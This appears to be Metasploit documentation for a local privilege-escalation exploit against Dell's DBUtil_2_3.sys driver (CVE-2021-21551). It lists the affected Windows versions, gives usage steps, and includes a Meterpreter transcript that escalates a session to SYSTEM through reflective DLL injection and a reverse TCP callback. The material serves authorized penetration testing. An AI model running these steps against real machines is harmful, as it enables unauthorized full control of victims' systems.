## Vulnerable Application
The `DBUtil_2_3.sys` driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by an attacker
to read and write kernel-mode memory.

### Supported Targets

* Windows 7 SP0 x64
* Windows 7 SP1 x64
* Windows 8.1 x64
* Windows 10 x64 v1607 - 21H1 (builds 14393 - 19043)
* Windows Server 2016 x64
* Windows Server 2019 x64

## Verification Steps

1. Start msfconsole
1. Get a Meterpreter session on a vulnerable host
1. Do: `use exploit/windows/local/cve_2021_21551_dbutil_memmove`
1. Set the `SESSION` and `PAYLOAD` options
1. Do: `run`
1. You should get a shell.

## Scenarios

### Windows 10 Version 1909 Build 18363.418 x64

```
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (200262 bytes) to 192.168.159.79
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.79:57013) at 2021-05-12 16:10:10 -0400

meterpreter > sysinfo
Computer        : DESKTOP-RTCRBEV
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-RTCRBEV\Alice Liddle
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > run exploit/windows/local/cve_2021_21551_dbutil_memmove

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 5212 launched.
[*] Reflectively injecting the DLL into 5212...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.159.79
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.79:57015) at 2021-05-12 16:12:43 -0400
[*] Session 3 created in the background.
meterpreter > sessions 3
[*] Backgrounding session 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
